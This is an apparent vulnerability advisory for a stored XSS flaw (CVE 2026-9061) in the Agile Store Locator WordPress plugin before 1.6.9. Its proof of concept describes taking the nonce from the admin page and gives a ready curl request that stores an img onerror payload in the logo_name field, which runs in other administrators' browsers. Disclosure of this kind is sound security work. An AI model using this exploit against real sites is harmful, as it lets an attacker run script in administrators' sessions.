Agile Store Locator < 1.6.9 – Admin+ Stored XSS via logo_name | CVE 2026-9061

Description

The plugin does not sanitize and escape store logo metadata before storing it and outputting it on the plugin admin page, allowing high-privileged users such as administrators to perform Stored Cross-Site Scripting attacks even when the `unfiltered_html` capability is disallowed (e.g. in a multisite network).

Proof of Concept

## Prerequisites

1. Activate the Agile Store Locator plugin (v1.6.8 or earlier).
2. At least one logo entry must exist in the plugin's logo library (one is created by default on activation). Note its `logo_id`.
3. Log in as an Administrator (in a multisite, log in as a subsite Admin without `unfiltered_html`).

## Steps

1. Visit `/wp-admin/admin.php?page=manage-store-logos` and extract the `nounce` value from the rendered page (assigned to `ASL_REMOTE.nounce` and inside the `"nounce":"..."` JSON literal).

2. Inject the XSS payload via the `update_logo` AJAX handler:

```bash
curl -k -c jar -b jar -X POST 'https://target/wp-admin/admin-ajax.php?action=asl_ajax_handler&sl-action=update_logo' \
  --data-urlencode 'asl-nounce=<NONCE>' \
  --data-urlencode 'data[logo_id]=<LOGO_ID>' \
  --data-urlencode 'data[action]=' \
  --data-urlencode 'data[logo_name]=<img src=x onerror=alert(/XSS-logo_name/)>' \
  --data-urlencode 'data[img_id]='
```

3. When any administrator (or super admin in multisite) visits `/wp-admin/admin.php?page=manage-store-logos`, the logos DataTable renders the stored `name` column via `td.innerHTML`, triggering the injected `onerror` handler in their browser session.